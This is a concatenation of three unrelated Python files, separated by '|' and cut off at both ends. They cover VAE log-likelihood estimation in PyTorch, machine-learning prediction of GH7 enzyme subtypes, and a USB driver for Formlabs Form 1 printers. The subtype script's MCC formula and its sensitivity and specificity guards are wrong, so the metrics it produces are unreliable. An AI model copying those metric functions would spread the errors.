@param dim: integer (default: 1)
which dimension to take the mean over
@return: PyTorch.Tensor
mean of x
"""
m = torch.max(x, dim=dim, keepdim=True)[0]
return m + torch.log(torch.mean(torch.exp(x - m),
dim=dim, keepdim=True))
def gaussian_log_pdf(x, mu, logvar):
"""
Log-likelihood of data given ~N(mu, exp(logvar))
@param x: samples from gaussian
@param mu: mean of distribution
@param logvar: log variance of distribution
@return log_pdf: PyTorch.Tensor
log-likelihood
"""
global LOG2PI
log_pdf = -0.5 * LOG2PI - logvar / 2. - torch.pow(x - mu, 2) / (2. * torch.exp(logvar))
return torch.sum(log_pdf, dim=1)
def unit_gaussian_log_pdf(x):
"""
Log-likelihood of data given ~N(0, 1)
@param x: PyTorch.Tensor
samples from gaussian
@return log_pdf: PyTorch.Tensor
log-likelihood
"""
global LOG2PI
log_pdf = -0.5 * LOG2PI - math.log(1.) / 2. - torch.pow(x, 2) / 2.
return torch.sum(log_pdf, dim=1)
def log_marginal_estimate(flags, n_samples, likelihood, image, style, content, dynamic_prior=None):
r"""Estimate log p(x). NOTE: this is not the objective that
should be directly optimized.
@param ss_list: list of sufficient stats, i.e., list of
torch.Tensor (batch size x # samples x 784)
@param image: torch.Tensor (batch size x 784)
original observed image
@param z: torch.Tensor (batch_size x # samples x z dim)
samples drawn from variational distribution
@param mu: torch.Tensor (batch_size x # samples x z dim)
means of variational distribution
@param logvar: torch.Tensor (batch_size x # samples x z dim)
log-variance of variational distribution
"""
batch_size = flags.batch_size
if style is not None:
z_style = style['z']
logvar_style = style['logvar']
mu_style = style['mu']
n, z_style_dim = z_style.size()
style_log_q_z_given_x_2d = gaussian_log_pdf(z_style, mu_style, logvar_style)
log_p_z_2d_style = unit_gaussian_log_pdf(z_style)
d_shape = image.shape
# for text mod: d_shape = [5, 1024]
if len(d_shape) == 3:
image = image.unsqueeze(0).repeat(n_samples, 1, 1, 1)
image = image.view(batch_size * n_samples, d_shape[-2], d_shape[-1])
elif len(d_shape) == 4:
image = image.unsqueeze(0).repeat(n_samples, 1, 1, 1, 1)
image = image.view(batch_size * n_samples, d_shape[-3], d_shape[-2],
d_shape[-1])
z_content = content['z']
mu_content = content['mu']
logvar_content = content['logvar']
log.debug(f'Computing log prob of image with shape: {image.shape}')
log_p_x_given_z_2d = likelihood.log_prob(image).view(batch_size * n_samples,
-1).sum(dim=1)
content_log_q_z_given_x_2d = gaussian_log_pdf(z_content, mu_content, logvar_content)
if dynamic_prior is None:
log_p_z_2d_content = unit_gaussian_log_pdf(z_content)
else:
mu_prior = dynamic_prior['mu']
logvar_prior = dynamic_prior['logvar']
log_p_z_2d_content = gaussian_log_pdf(z_content, mu_prior, logvar_prior)
if style is not None:
log_p_z_2d = log_p_z_2d_style + log_p_z_2d_content
log_q_z_given_x_2d = style_log_q_z_given_x_2d + content_log_q_z_given_x_2d
else:
log_p_z_2d = log_p_z_2d_content
log_q_z_given_x_2d = content_log_q_z_given_x_2d
log_weight_2d = log_p_x_given_z_2d + log_p_z_2d - log_q_z_given_x_2d
log_weight = log_weight_2d.view(batch_size, n_samples)
# need to compute normalization constant for weights
# i.e. log ( mean ( exp ( log_weights ) ) )
log_p = log_mean_exp(log_weight, dim=1)
return torch.mean(log_p)
def log_joint_estimate(flags, n_samples, likelihoods, targets, styles, content, dynamic_prior=None):
r"""Estimate log p(x,y).
@param recon_image: torch.Tensor (batch size x # samples x 784)
reconstructed means on bernoulli
@param image: torch.Tensor (batch size x 784)
original observed image
@param recon_label: torch.Tensor (batch_size x # samples x n_class)
reconstructed logits
@param label: torch.Tensor (batch_size)
original observed labels
@param z: torch.Tensor (batch_size x # samples x z dim)
samples drawn from variational distribution
@param mu: torch.Tensor (batch_size x # samples x z dim)
means of variational distribution
@param logvar: torch.Tensor (batch_size x # samples x z dim)
log-variance of variational distribution
"""
batch_size = flags.batch_size
if styles is not None:
styles_log_q_z_given_x_2d = {}
styles_p_z_2d = {}
for key in styles.keys():
if styles[key] is not None:
style_m = styles[key]
z_style_m = style_m['z']
logvar_style_m = style_m['logvar']
mu_style_m = style_m['mu']
style_m_log_q_z_given_x_2d = gaussian_log_pdf(z_style_m, mu_style_m, logvar_style_m)
log_p_z_2d_style_m = unit_gaussian_log_pdf(z_style_m)
styles_log_q_z_given_x_2d[key] = style_m_log_q_z_given_x_2d
styles_p_z_2d[key] = log_p_z_2d_style_m
z_content = content['z']
mu_content = content['mu']
logvar_content = content['logvar']
num_mods = len(styles.keys())
log_px_zs = torch.zeros(num_mods, batch_size * n_samples)
log_px_zs = log_px_zs.to(flags.device)
for k, key in enumerate(styles.keys()):
batch_d = targets[key]
d_shape = batch_d.shape
if len(d_shape) == 3:
batch_d = batch_d.unsqueeze(0).repeat(n_samples, 1, 1, 1)
batch_d = batch_d.view(batch_size * n_samples, d_shape[-2], d_shape[-1])
elif len(d_shape) == 4:
batch_d = batch_d.unsqueeze(0).repeat(n_samples, 1, 1, 1, 1)
batch_d = batch_d.view(batch_size * n_samples, d_shape[-3], d_shape[-2],
d_shape[-1])
lhood = likelihoods[key]
log_p_x_given_z_2d = lhood.log_prob(batch_d).view(batch_size * n_samples, -1).sum(dim=1)
log_px_zs[k] = log_p_x_given_z_2d
# compute components of likelihood estimate
log_joint_zs_2d = log_px_zs.sum(0) # sum over modalities
if dynamic_prior is None:
log_p_z_2d_content = unit_gaussian_log_pdf(z_content)
else:
mu_prior = dynamic_prior['mu']
logvar_prior = dynamic_prior['logvar']
log_p_z_2d_content = gaussian_log_pdf(z_content, mu_prior, logvar_prior)
content_log_q_z_given_x_2d = gaussian_log_pdf(z_content, mu_content, logvar_content)
log_p_z_2d = log_p_z_2d_content
log_q_z_given_x_2d = content_log_q_z_given_x_2d
if styles is not None:
for k, key in enumerate(styles.keys()):
if key in styles_p_z_2d and key in styles_log_q_z_given_x_2d:
log_p_z_2d += styles_p_z_2d[key]
log_q_z_given_x_2d += styles_log_q_z_given_x_2d[key]
log_weight_2d = log_joint_zs_2d + log_p_z_2d - log_q_z_given_x_2d
log_weight = log_weight_2d.view(batch_size, n_samples)
log_p = log_mean_exp(log_weight, dim=1)
return torch.mean(log_p)
|
"""
Prediction of GH7 subtypes (CBH/EG) with machine learning (ML)
"""
# Imports
#===========#
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pydot_ng as pydot
from imblearn.under_sampling import RandomUnderSampler
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import KFold
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
from sklearn import tree
from sklearn.externals.six import StringIO
import warnings
warnings.filterwarnings("ignore")
import bioinf
# Get lengths of loops from MSA
#================================================#
def get_gh7looplength(msafasta, trecel7a_pos=0):
''' Return a DataFrame of the number of residues in the 8 loops of GH7 sequences in
an MSA fasta file. TreCel7A is used as reference for determining the loop positions
in the MSA. The position of TreCel7A in the fasta file is trecel7a_pos (0 if first).
Loop lengths are in the order [A1, A2, A3, A4, B1, B2, B3, B4]. '''
# Loop residues in TreCel7A
loopres = ['QSAQK', 'TSSGVPAQVESQS', 'DYYAN', 'TNETSSTPGA',
'YDGNTW', 'PSSNNANT', 'GGTYSDNRYG', 'GGSS'] # Residues in the loops of TreCel7A
loopmore = ['NVGARLY', 'PNAKVTFSNIK', 'MLWLDST', 'VRGSCSTSSGVPA',
'SSTLCPD', 'GIGGHGSCCS', 'GTCDPDGCDWNP', 'FSDKGGL'] # Residues after the loops
# Get aligned sequences
[heads, sequences] = bioinf.split_fasta(msafasta) # Retrieve sequences from fasta file
trecel7a_seq_msa = sequences[trecel7a_pos]
trecel7a_nogaps = trecel7a_seq_msa.replace('-','')
trecel7a_list = list(trecel7a_seq_msa)
# Get loop positions in MSA (using TreCel7A as reference)
numb = -1
for k in range(len(trecel7a_list)):
if trecel7a_list[k].isalpha():
numb += 1
trecel7a_list[k] = str(numb)
startpos = [trecel7a_list.index(str(trecel7a_nogaps.index(loopres[i])))
for i in range(len(loopres))]
stoppos = [trecel7a_list.index(str(trecel7a_nogaps.index(loopmore[i])))
for i in range(len(loopmore))]
length = [stoppos[i] - startpos[i] for i in range(len(startpos))]
# Determine loop length
store = []
for i in range(len(sequences)):
seq = sequences[i]
loopregion = [seq[startpos[k]:stoppos[k]] for k in range(len(loopres))]
looplength = [length[k] - loopregion[k].count('-') for k in range(len(loopres))]
store.append(looplength)
# Save results as DataFrame
result = pd.DataFrame(store)
result.columns = ['A1', 'A2', 'A3', 'A4', 'B1', 'B2', 'B3', 'B4']
return result
# Calculate loop lengths
msafile = 'fasta/structure_based_alignment/cel7_nr99_structaln.fasta'
looplength = get_gh7looplength(msafile, trecel7a_pos=0)
# Write results to spreadhseet
looplength.index = range(1, len(looplength)+1)
looplength['accession'] = bioinf.get_accession(msafile)
looplength.to_csv('results_final/looplength.csv')
# Data preprocessing: prepare data for machine learning
#================================================================#
# Retreive data
looplength = pd.read_csv('results_final/looplength.csv', index_col=0)
subtype = pd.read_csv('results_final/cel7_subtypes.csv', index_col=0)
looplength.index = range(len(looplength))
subtype.index = range(len(subtype))
assert looplength.accession.equals(subtype.accession) # Ensure sequence positions are the same
# View the distribution to intuitively determine outliers
maxlength = [14, 20, 25, 16, 52, 141, 50, 14] # Values equal or greater than are outliers
topcode_vals = [] # Change the outlier values to top-coded values
for i in range(8):
sortedvals = sorted(looplength.iloc[:,i])
maxval = maxlength[i]
topcode_vals.append(sortedvals[sortedvals.index(maxval) - 1])
color = ['blue' if x<maxval else 'red' for x in sortedvals]
loop = looplength.columns[i]
plt.scatter(range(len(looplength)), sortedvals, color=color,
marker='.')
plt.xlabel('Index')
plt.ylabel('Length')
plt.title(loop)
plt.show()
plt.close()
# Deal with outliers
# Top-coding outliers before calculating Z-scores
X_grand = looplength.iloc[:,:-1]
for i in range(len(X_grand.columns)):
vals = list(X_grand.iloc[:,i])
vals = [x if x<maxlength[i] else topcode_vals[i] for x in vals]
X_grand.iloc[:,i] = pd.Series(vals)
# Standardize data (convert to Z-scores)
scx = StandardScaler()
X_grand = pd.DataFrame(scx.fit_transform(X_grand))
X_grand.columns = looplength.iloc[:,1:].columns
y_grand = pd.Series(list(subtype['ncbi_pred_class']), index=range(len(subtype)))
# Apply machine learning to predict subtypes from loop lengths
#==============================================================================#
def get_classifier(clf_type, depth=1):
'''Return an instance of the specified classifier.'''
if clf_type == 'dec':
classifier = DecisionTreeClassifier(criterion='entropy', max_depth=depth)
elif clf_type == 'svm':
classifier = SVC(kernel='rbf')
elif clf_type == 'knn':
classifier = KNeighborsClassifier(n_neighbors=10)
elif clf_type == 'log':
classifier = LogisticRegression()
return classifier
def apply_ML(X_grand, y_grand, clf_type, monte_count=100):
'''Apply ML to predict subtypes from loop lengths.
Return a tuple of dataframes of performance results,
(sensitivity, specificity, accuracy, MCC).'''
# Empty lists for storing final results
sens_final, spec_final, acc_final, mcc_final = [], [], [], []
# Monte Carlo loop
for i in range(monte_count):
RUS = RandomUnderSampler(random_state=None)
X_select, y_select = RUS.fit_resample(X_grand, y_grand)
X_select, y_select = pd.DataFrame(X_select), pd.Series(y_select)
# K-fold cross validation
kf = KFold(n_splits=5, shuffle=True, random_state=None)
kf_indices = kf.split(X_select)
for train_index, test_index in kf_indices:
X_train, y_train = X_select.iloc[train_index,:], y_select.iloc[train_index]
X_test, y_test = X_select.iloc[test_index,:], y_select.iloc[test_index]
# Empty lists for storing kfold cross validation results
sens_store, spec_store, acc_store, mcc_store = [], [], [], []
# Single-feature loop (Train classifier using single feature independently)
for j in range(8):
# Get classifier and fit to training data
classifier = get_classifier(clf_type)
classifier.fit(pd.DataFrame(X_train.iloc[:,j]), y_train)
# Test classifier on test set
y_pred = classifier.predict(pd.DataFrame(X_test.iloc[:,j]))
# Evaluate performance
cm = confusion_matrix(y_test, y_pred)
tn, tp, fn, fp = cm[0][0], cm[1][1], cm[1][0], cm[0][1]
n = tp + fp + tn + fn
accuracy = (tp + tn)/n * 100
mcc = ((tp*tn) - (fp*fn))/np.sqrt((tp+fp)*(tn+fn)*(tp+fp)*(tn+fp))
sens = tp/(tp + fn) * 100 if tp + fp != 0 else 0
spec = tn/(tn + fp) * 100 if tn + fn != 0 else 0
# Save results
sens_store.append(sens)
spec_store.append(spec)
acc_store.append(accuracy)
mcc_store.append(mcc)
# Multiple-features (Train classifier on all features)
classifier = get_classifier(clf_type, depth=8)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(pd.DataFrame(X_test))
# Evaluate performance
cm = confusion_matrix(y_test, y_pred)
tn, tp, fn, fp = cm[0][0], cm[1][1], cm[1][0], cm[0][1]
n = tp + fp + tn + fn
accuracy = (tp + tn)/n * 100
mcc = ((tp*tn) - (fp*fn))/np.sqrt((tp+fp)*(tn+fn)*(tp+fp)*(tn+fp))
sens = tp/(tp + fn) * 100 if tp + fp != 0 else 0
spec = tn/(tn + fp) * 100 if tn + fn != 0 else 0
# Save results
sens_store.append(sens)
spec_store.append(spec)
acc_store.append(accuracy)
mcc_store.append(mcc)
# Save all results to final store
sens_final.append(sens_store)
spec_final.append(spec_store)
acc_final.append(acc_store)
mcc_final.append(mcc_store)
sens_final = pd.DataFrame(sens_final)
spec_final = pd.DataFrame(spec_final)
acc_final = pd.DataFrame(acc_final)
mcc_final = pd.DataFrame(mcc_final)
mcc_final = mcc_final.fillna(0)
# Combine results to a single dataframe
results = pd.DataFrame()
columns = ['A1', 'A2', 'A3', 'A4', 'B1','B2', 'B3', 'B4', 'all8']
results['features'] = columns
results['sens_mean'] = sens_final.mean()
results['sens_std'] = sens_final.std()
results['spec_mean'] = spec_final.mean()
results['spec_std'] = spec_final.std()
results['acc_mean'] = acc_final.mean()
results['acc_std'] = acc_final.std()
results['mcc_mean'] = mcc_final.mean()
results['mcc_std'] = mcc_final.std()
mcc_final.columns = columns
return results, mcc_final
# Implement machine learning using 4 different classifiers
clf_types = ['dec', 'svm', 'knn', 'log']
for clf_type in clf_types:
results, mcc_data = apply_ML(X_grand, y_grand, clf_type, monte_count=100)
results.to_csv(f'results_final/ml_subtype_pred/{clf_type}.csv')
mcc_data.to_csv(f'results_final/mcc_data/{clf_type}.csv')
# Get single-node decision tree rules
#=====================================#
X_grand = looplength.iloc[:,1:] # Non-standardized lengths
for i in range(len(X_grand.columns)):
RUS = RandomUnderSampler(random_state=None)
X = pd.DataFrame(X_grand.iloc[:,i])
loop = X.columns
X, y = RUS.fit_resample(X, y_grand)
X, y = pd.DataFrame(X,columns=loop ), pd.Series(y)
clf = DecisionTreeClassifier(max_depth=1, criterion='entropy')
clf.fit(X, y)
dot_data = StringIO()
tree.export_graphviz(clf, out_file=dot_data,
feature_names=X.columns,
class_names=['EG', 'CBH'],
filled=True, rounded=True,
special_characters=True)
graph = pydot.graph_from_dot_data(dot_data.getvalue())
graph.write_pdf(f'plots/dec_tree_rules/{X.columns[0]}.pdf')
# Probability of significant truncation in A4, B2, and B3 loops if the B4 loop is short
#========================================================================================#
X_grand = looplength.iloc[:,1:] # Non-standardized lengths
b4_less = X_grand[X_grand['B4']<=3]
all_less = b4_less[b4_less['B3']<=3]
all_less = all_less[all_less['A4']<=5]
all_less = all_less[all_less['B2']<=4]
proba = len(all_less)/len(b4_less) * 100
|
# -*- coding: utf-8 -*-
"""
Printer.py
A library to interface with the Form 1 and Form 1+ over USB
Copyright 2016-2017 Formlabs
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import division
import ctypes
import errno
import io
import struct
import time
import ast
import usb.core
import numpy as np
from OpenFL import FLP
################################################################################
class DecodeError(RuntimeError):
pass
class BadResponse(RuntimeError):
pass
class LaserPowerError(RuntimeError):
pass
class Printer(object):
""" Instantiation of a printer object
"""
# VID and PID for the Form 1 and Form 1+
VID = 0x16d0
PID = 0x07eb
# Endpoint numbers for TX and RX
TX_EP = 0x81 # Printer -> computer
RX_EP = 0x03 # Computer -> printer
SOF = 0xFF # Special character marking the beginning of a transmission
EOF = 0xFE # Special character marking the end of a transmission
ESCAPE = 0xFD # Character used to escape special characters in a bytestring
AUDIT_LASER_POWER = True
LASER_POWER_MAX_MW = 64
def __init__(self, connect=True, timeout_ms=10000):
if connect:
self.dev = usb.core.find(idVendor=self.VID, idProduct=self.PID)
if self.dev is None:
raise RuntimeError("Could not find printer")
self.dev.default_timeout = 100
try:
self.dev.set_configuration()
except usb.USBError as e:
e.strerror += ". Be sure PreForm is closed."
raise
self.timeout_ms = timeout_ms
self.incoming = []
self.packet = bytearray()
# These values are loaded from the printer as-needed
self._laser_table = None
self._grid_table = None
def _read(self, bufsize=1024):
""" Reads raw data from the printer's usual endpoint
"""
return bytearray(self.dev.read(self.TX_EP, bufsize, timeout=self.timeout_ms))
def _write(self, data):
""" Writes raw data to the printer's usual endpoint
"""
return self.dev.write(self.RX_EP, data, timeout=self.timeout_ms)
@classmethod
def _decode(cls, received):
""" Strips the escape characters from streamed data
"""
out = b''
escaping = False
for byte in received:
if escaping:
out += bytearray([byte + cls.ESCAPE])
escaping = False
elif byte == cls.ESCAPE:
escaping = True
else:
out += bytearray([byte])
return out
@classmethod
def _encode(cls, payload):
""" Protects a stream of data with escape characters
The payload should be a bytestring
"""
out = b''
for byte in payload:
if byte >= cls.ESCAPE:
out += bytearray([cls.ESCAPE])
byte = ctypes.c_uint8(byte - cls.ESCAPE).value
out += bytearray([byte])
return out
@classmethod
def _interpret(cls, cmd, data):
""" Applies a command-specific interpretation to the data
cmd is a Command object
data is a decoded packet
"""
if cmd == Command.CMD_MACHINE_STATE:
return State(data[0])
# Layer and block done return the layer / block number
elif cmd in [Command.STATUS_LAYER_DONE, Command.STATUS_BLOCK_DONE]:
return struct.unpack('<I', data)[0]
# Assume one-byte responses to be a standard error code
# (unless specified above)
elif len(data) == 1:
return Response(data[0])
else:
return data if data else None
def _process_raw(self, data):
""" Processes a stream of raw data, breaking it into packets
Packets are stored as (Command, Payload) tuples in self.incoming
"""
self.packet += data
# Trim data off the front until we find a SOF character
while self.packet[0] != self.SOF:
self.packet.pop(0)
# Process the packet, loading data into self.incoming
while self.packet:
cmd = Command(self.packet[1])
# If the packet contains an EOF character, then read in the
# full packet and store it in the incoming buffer
try:
p, self.packet = self.packet[2:].split(bytearray([self.EOF]), 1)
except ValueError:
break
else:
self.incoming.append(
(cmd, self._interpret(cmd, self._decode(p))))
def _command(self, cmd, payload=b'', wait=True, expect_success=False, verbose=False):
""" Transmits a command to the printer
The command is wrapped in the form SOF, cmd, encode(payload), EOF
If wait is true, waits for the acknowledgment
(in the form of a returned packet with cmd)
wait can also be a list of valid returned packet Commands
(for commands with multiple return options)
If expect_success is True and the returned response is not SUCCESS,
raises a BadResponse error with the Response code.
"""
self._write(bytearray([self.SOF, cmd.value])
+ self._encode(payload) + bytearray([self.EOF]))
if wait is True:
wait = [cmd]
if wait:
r = self._wait_for_packet(wait, verbose=verbose)
if expect_success and r != Response.SUCCESS:
raise BadResponse(r)
return r
else:
return None
def _wait_for_packet(self, cmd, verbose=True):
""" Waits for a returned packet of the given type(s).
Returns the packet's payload.
If verbose is True, prints all packets received while waiting
"""
if isinstance(cmd, Command):
cmd = [cmd]
while True:
p = self.poll()
if verbose and p is not None:
# Truncate bytearrays to prevent huge printouts
if type(p[1]) is bytearray:
print("(%s, <%i byte payload>)" % (p[0], len(p[1])))
else:
print(p)
if p is not None and p[0] in cmd:
return p[1]
def poll(self, bufsize=1024):
""" Returns the next received packet as a tuple (command, payload)
If there are no packets pending, returns None
"""
# Attempt to load data from USB and push it into the incoming buffer
while not self.incoming:
try:
raw = self._read(bufsize)
except usb.core.USBError as e:
# The only acceptable USB errors are timeout errors
# (when the device hasn't sent us any new data)
if e.errno != errno.ETIMEDOUT:
raise e
break
else:
self._process_raw(raw)
# Return the oldest packet or None
return self.incoming.pop(0) if self.incoming else None
def initialize(self):
""" Runs the printer through its initialization sequence:
Stops any print or operation
Resets the machine
Sets laser current to zero
Sets galvo position to 0, 0
Homes Z axis against limit switch and rams tilt against hard stop
Sets feed rates to default values
"""
self._command(Command.CMD_INITIALIZE, expect_success=True)
def shutdown(self):
""" Turns off all parts of the printer other than the processor
"""
self._command(Command.CMD_SHUTDOWN, expect_success=True)
def list_blocks(self):
""" Lists blocks on the printer, returning an array of integers
"""
data = self._command(Command.CMD_LIST_BLOCKS)
num = struct.unpack('<I', data[:4])[0]
return struct.unpack('<%iI' % num, data[4:])
def delete_block(self, block, end=None):
""" Removes a block by number
If end is given, deletes from block to end (inclusive)
"""
if end is None:
end = block
self._command(Command.CMD_DELETE_BLOCKS,
bytearray(struct.pack('<II', block, end)),
expect_success=True)
def read_block_raw(self, block):
""" Reads a block by number.
The result is an FLP.Packets object, which is a Python list,
meaning you can delete and insert entries, just like in a list.
"""
data = self._command(Command.CMD_READ_BLOCK,
bytearray(struct.pack('<I', block)),
wait=[Command.CMD_READ_BLOCK, Command.CMD_READ_BLOCK_DATA])
# If we got a response code, return it immediately
if isinstance(data, Response):
if data == Response.ERROR_MALFORMED_REQUEST:
raise BadResponse("Got %s; is this block on the printer?" % data)
return data
# Extract block and count from the returned data
block_received, count = struct.unpack('<II', data[:8])
# Sanity-check responses
if block_received != block:
raise BadResponse("Block received was not block requested")
elif count != len(data) - 12:
raise BadResponse("Didn't receive enough data in the block")
# Return the data section of the block, stripping the trailing CRC
return data[8:-4]
def read_block_flp(self, block):
return FLP.fromstring(self.read_block_raw(block))
@staticmethod
def _fletcher32(data):
""" As it turns out, the firmware doesn't implement CRC checking.
"""
return 0
def audit_laser_power_flp(self, flp):
""" Raise if the FLP has unsafe powers.
"""
for p in flp:
if isinstance(p, FLP.LaserPowerLevel):
self.check_laser_ticks(p.power)
def check_laser_ticks(self, power):
""" Raises if the power (in laser ticks) is above our safe threshold
"""
mW = self.ticks_to_mW(power)
if mW > self.LASER_POWER_MAX_MW:
raise LaserPowerError('Requested power is dangerously high.')
def get_machine_information(self):
data = self._command(Command.CMD_MACHINE_INFORMATION)
parts = struct.unpack('<I32sI7s7s7s7s', data)
result = dict((field, x) for field, x in zip(('modelNumber',
'serialNumber',
'firmwareVersion',
'gitVersion',
'libmapleVersion',
'mapleSdFatVersion',
'tinyprintfVersion'), parts))
return result
def write_block(self, block, data, skip_audit=False):
""" Writes a block.
block is an integer
data is a bytearray, filename, or FLP.Packets object
"""
if isinstance(data, FLP.Packets):
assert skip_audit == False
return self.write_block_flp(block, data)
if not isinstance(data, bytearray):
data = bytearray(open(data, 'rb').read())
# Check to see that laser power is always acceptable,
# raising an exception if the power is too high
if self.AUDIT_LASER_POWER and not skip_audit:
flp = FLP.fromstring(data)
self.audit_laser_power_flp(flp)
header = bytearray(
struct.pack('<III', block, len(data), self._fletcher32(data)))
self._command(Command.CMD_LOAD_PRINT_DATA_BLOCK, header + data,
expect_success=True)
def write_block_flp(self, block, flp):
""" Writes FLP data to a block.
block is an integer
flp is a FLP.Packets object
"""
print("write block flp")
if not isinstance(flp, FLP.Packets):
raise TypeError("flp must be a FLP.Packets instance; got a {}.".format(type(flp)))
if self.AUDIT_LASER_POWER:
self.audit_laser_power_flp(flp)
self.write_block(block, bytearray(flp.tostring()), skip_audit=True)
def block_size(self, block):
""" Returns block size (in bytes) of the target block
"""
data = self._command(Command.CMD_BLOCK_INFORMATION,
bytearray(struct.pack('<I', block)))
block_received, size, crc = struct.unpack('<III', data)
if block_received != block:
raise BadResponse("Block received was not block requested")
return size
def _read_cal_field(self, cmd):
""" Reads a calibration field from the printer
command must be CMD_READ_LASER_TABLE, CMD_READ_GRID_TABLE, or
CMD_READ_ZSENSOR_HEIGHT
"""
data = self._command(cmd)
if isinstance(data, Response):
return data
# Extract block and count from the returned data
count = struct.unpack('<I', data[:4])[0]
# Sanity-check responses
if count != len(data) - 8:
raise BadResponse("Didn't receive enough data in the block")
# Return the data section of the block, stripping the trailing CRC
# and evaluating to get a list of lists
return ast.literal_eval(np.atleast_1d(data[4:-4])[0].decode('utf-8'))
def read_laser_table(self):
""" Reads the printer's laser table
"""
return self._read_cal_field(Command.CMD_READ_LASER_TABLE)
def read_grid_table(self):
""" Reads the printer's laser table
"""
return self._read_cal_field(Command.CMD_READ_GRID_TABLE)
def read_zsensor_height(self):
""" Reads the printer's Z height
"""
return self._read_cal_field(Command.CMD_READ_ZSENSOR_HEIGHT)
def state(self):
""" Checks the printer's state, returning a State object
"""
return self._command(Command.CMD_MACHINE_STATE)
def _wait_for_state(self, state=None, dt=0.1):
""" Blocks until the printer's state machines the input state
state is a State or list of States
dt is the polling interval
"""
if state is None:
state = State.MACHINE_READY_TO_PRINT
if not hasattr(state, '__iter__'):
state = [state]
while self.state() not in state:
time.sleep(dt)
def start_printing(self, block, end=None):
""" Begins printing from the given block, returning immediately
The range (block, end) is half-open, so:
* block == 0, end == 1 is just layer 0
* block == 0, end == 2 is layer 0 and 1
* block == 10, end == 20 is layer 10, 11, ..., 19
If end is None, then it just prints one layer.
The printer may receive the following packets while printing:
STATUS_LAYER_DONE
STATUS_LAYER_NON_FATAL_ERROR
STATUS_BLOCK_DONE
STATUS_PRINT_DONE
"""
if end is None:
end = block + 1
if end <= block:
raise RuntimeError("end must be > block")
self._command(Command.CMD_START_PRINTING,
bytearray(struct.pack('<II', block, end)),
expect_success=True)
def stop_printing(self):
""" Stops a print in progress
Turns the laser off and stops any in-progress galvo and motor moves
"""
self._command(Command.CMD_STOP_PRINTING, expect_success=True)
def pause_printing(self):
""" Sets the pause flag on the printer.
When the pause flag is set, the printer will pause at the next
layer end command.
A paused printer stops executing its current block and waits for
debug commands
"""
self._command(Command.CMD_PAUSE_PRINTING, expect_success=True)
def unpause_printing(self):
""" Clears the pause flag on the printer.
"""
self._command(Command.CMD_UNPAUSE_PRINTING, expect_success=True)
def move_z(self, steps, feedrate, current=80):
""" Moves the Z stepper a certain number of steps
steps is a signed number of microsteps to move
feedrate is speed in microsteps per second
current is the current value (at a scale of 80 per amp)
The motor driver will current-limit and turn off if the current
is too high (about 160)
"""
self._command(Command.CMD_MOVE_Z_STEPPER_INCREMENTAL,
bytearray(struct.pack('<iIB', steps, feedrate, current)),
expect_success=True)
def set_laser_uint16(self, x, y, power=25000):
""" Sets the position and laser power level
x and y are unsigned 16-bit values (0 to 0xffff)
(with 0 at the corner of the platform)
power is an unsigned 16-bit integer
Setting power too high can damage your diode!
"""
if self.AUDIT_LASER_POWER:
self.check_laser_ticks(power)
self._command(Command.CMD_POSITION_LASER,
bytearray(struct.pack('<HHH', x, y, power)),
expect_success=True)
def set_laser_sint16(self, x, y, power=25000):
""" Sets the position and laser power level
x and y are signed 16-bit values (-32768 to 32767)
(with 0 at the center of the platform)
power is an unsigned 16-bit integer
Setting power too high can damage your diode!
"""
return self.set_laser_uint16(x + round(0xffff/2), y + round(0xffff/2), power)
def set_laser_mm_mW(self, x_mm, y_mm, mW=10):
""" Sets the laser position in mm and power in mW.
Position (0, 0) is the center of the field.
"""
x, y = self.mm_to_galvo(x_mm, y_mm)
return self.set_laser_uint16(x, y, self.mW_to_ticks(mW))
def ticks_to_mW(self, ticks):
""" Given a power number, return the power in mW
This conversion depends on per-printer calibration.
"""
if self._laser_table is None:
self._laser_table = np.asarray(self.read_laser_table())
return np.interp(ticks,
self._laser_table[:,0] * float(0xffff) / 3.3,
self._laser_table[:,1])
def mW_to_ticks(self, mW):
""" Converts a power in mW to arbitrary laser units
This conversion depends on per-printer calibration.
Raises an exception if the desired power is out of range.
"""
if self._laser_table is None:
self._laser_table = np.asarray(self.read_laser_table())
if mW > max(self._laser_table[:,1]):
raise LaserPowerError(
'Requested power (%.2f mW) exceeds max power (%.2f mW)' %
(mW, max(self._laser_table[:,1])))
# Convert to power values with linear interpolation
result = np.interp(mW, self._laser_table[:,1],
self._laser_table[:,0] * float(0xffff) / 3.3)
if result < 0 or result > 0xffff:
raise LaserPowerError(
'Requested power is not a uint16. Check power table.')
return result
def mm_to_galvo(self, x, y):
""" Given one or many points in mm space, map them to galvo space.
e.g.,
>>> Printer.mm_to_galvo(0, 0) # -> galvo ticks for middle of build area.
>>> Printer.mm_to_galvo([[0, 1, 2], [0, 0, 0]]) # -> A three-segment line along the x axis.
The returned array is 2xN, where N is the number of source points
"""
xshape = np.shape(x)
if self._grid_table is None:
grid = np.array(self.read_grid_table())
assert grid.shape == (5, 5, 2)
pts_mm = np.linspace(-64, 64, 5) # Grid positions in mm
# Interpolators for X and Y values (mm to galvo ticks)
import scipy.interpolate
fit_x = scipy.interpolate.interp2d(pts_mm, pts_mm, grid[:,:,0])
fit_y = scipy.interpolate.interp2d(pts_mm, pts_mm, grid[:,:,1])
self._grid_table = (fit_x, fit_y)
if np.shape(x) != np.shape(y):
raise TypeError('x and y shapes must match. Got x.shape: {}, y.shape: {}'.format(np.shape(x), np.shape(y)))
x = np.atleast_1d(x)
y = np.atleast_1d(y)
x_ = [self._grid_table[0](a, b) for a, b in zip(x, y)]
y_ = [self._grid_table[1](a, b) for a, b in zip(x, y)]
result = np.hstack([x_, y_]).T
if xshape == (): # If it's called with scalars, return a flat result.
return result.flatten()
return result
@staticmethod
def sample_line_segment_mm_s(start_xy_mm, end_xy_mm, dt_s, mW=None, max_mm=5.0):
""" Given a line segment in mm space, map it to galvo space.
To make the line straight in mm space, samples may be added to
more-closely approximate a straight line.
Returns: An array of shape nx3 (if mW is None) or nx4 (if mW is not None)
of points time deltas in mm and seconds,
